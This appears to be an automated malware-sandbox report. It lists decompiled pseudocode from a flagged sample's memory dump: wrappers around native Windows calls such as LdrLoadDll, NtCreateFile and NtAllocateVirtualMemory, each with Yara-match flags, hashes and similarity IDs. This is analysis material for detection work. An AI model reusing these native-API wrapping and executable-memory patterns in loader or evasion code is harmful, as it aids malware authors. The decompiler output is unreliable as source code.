                                                                                                                                                        • API String ID: 2738559852-2163208940
                                                                                                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                        • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                                                                                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                        • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                                                        				char* _v8;
                                                                                                                                                        				struct _EXCEPTION_RECORD _v12;
                                                                                                                                                        				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                                        				char _v536;
                                                                                                                                                        				void* _t15;
                                                                                                                                                        				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                                        				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                                        				void* _t30;
                                                                                                                                                        				void* _t31;
                                                                                                                                                        				void* _t32;
                                                                                                                                                        
                                                                                                                                                        				_v8 =  &_v536;
                                                                                                                                                        				_t15 = E0041C650( &_v12, 0x104, _a8);
                                                                                                                                                        				_t31 = _t30 + 0xc;
                                                                                                                                                        				if(_t15 != 0) {
                                                                                                                                                        					_t17 = E0041CA70(__eflags, _v8);
                                                                                                                                                        					_t32 = _t31 + 4;
                                                                                                                                                        					__eflags = _t17;
                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                        						E0041CCF0( &_v12, 0);
                                                                                                                                                        						_t32 = _t32 + 8;
                                                                                                                                                        					}
                                                                                                                                                        					_t18 = E0041AEA0(_v8);
                                                                                                                                                        					_v16 = _t18;
                                                                                                                                                        					__eflags = _t18;
                                                                                                                                                        					if(_t18 == 0) {
                                                                                                                                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                                        						return _v16;
                                                                                                                                                        					}
                                                                                                                                                        					return _t18;
                                                                                                                                                        				} else {
                                                                                                                                                        					return _t15;
                                                                                                                                                        				}
                                                                                                                                                        			}














                                                                                                                                                        APIs
                                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Load
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                                        • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                                                                                        • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                                                                                                                        • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                                                                                        • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                        				long _t21;
                                                                                                                                                        				void* _t31;
                                                                                                                                                        
                                                                                                                                                        				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                                                        				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                        				return _t21;
                                                                                                                                                        			}






                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                        • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                                                                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                        • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                        				long _t14;
                                                                                                                                                        				void* _t21;
                                                                                                                                                        
                                                                                                                                                        				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                                                                        				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                                                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                        				return _t14;
                                                                                                                                                        			}






                                                                                                                                                        APIs
                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                        • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                                                                                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                        • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                        			E00419E8A(char __edx, intOrPtr _a4, void* _a8) {
                                                                                                                                                        				char _v117;
                                                                                                                                                        				long _t9;
                                                                                                                                                        				void* _t14;
                                                                                                                                                        
                                                                                                                                                        				asm("rcl esi, 0x4d");
                                                                                                                                                        				_v117 = __edx;
                                                                                                                                                        				_t6 = _a4;
                                                                                                                                                        				_t3 = _t6 + 0x10; // 0x300
                                                                                                                                                        				_t4 = _t6 + 0xc50; // 0x40a923
                                                                                                                                                        				E0041A960(_t14, _a4, _t4,  *_t3, 0, 0x2c);
                                                                                                                                                        				_t9 = NtClose(_a8); // executed
                                                                                                                                                        				return _t9;
                                                                                                                                                        			}







                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                        • Opcode ID: c1018387def85eeed92f59d50137b54cc45b6d41c7f080cf34bb8c5060453614
                                                                                                                                                        • Instruction ID: 6db9ccbf1bc62842b2b5d528f195f87351d07581d9f56d4640ef1b159193b464
                                                                                                                                                        • Opcode Fuzzy Hash: c1018387def85eeed92f59d50137b54cc45b6d41c7f080cf34bb8c5060453614
                                                                                                                                                        • Instruction Fuzzy Hash: 01E08CB6641214AFD720DBA8CC85EDB7B68EF553A0F194599F95DAB242C130A5008BA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00419E90(intOrPtr _a4, void* _a8) {
                                                                                                                                                        				long _t8;
                                                                                                                                                        				void* _t11;
                                                                                                                                                        
                                                                                                                                                        				_t5 = _a4;
                                                                                                                                                        				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                        				_t3 = _t5 + 0xc50; // 0x40a923
                                                                                                                                                        				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                        				_t8 = NtClose(_a8); // executed
                                                                                                                                                        				return _t8;
                                                                                                                                                        			}






                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                        • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                                                                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                        • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                        • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                        • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                        • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                        • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                        • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                        • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                        • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                        • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                        • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                        • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                        • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                        • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
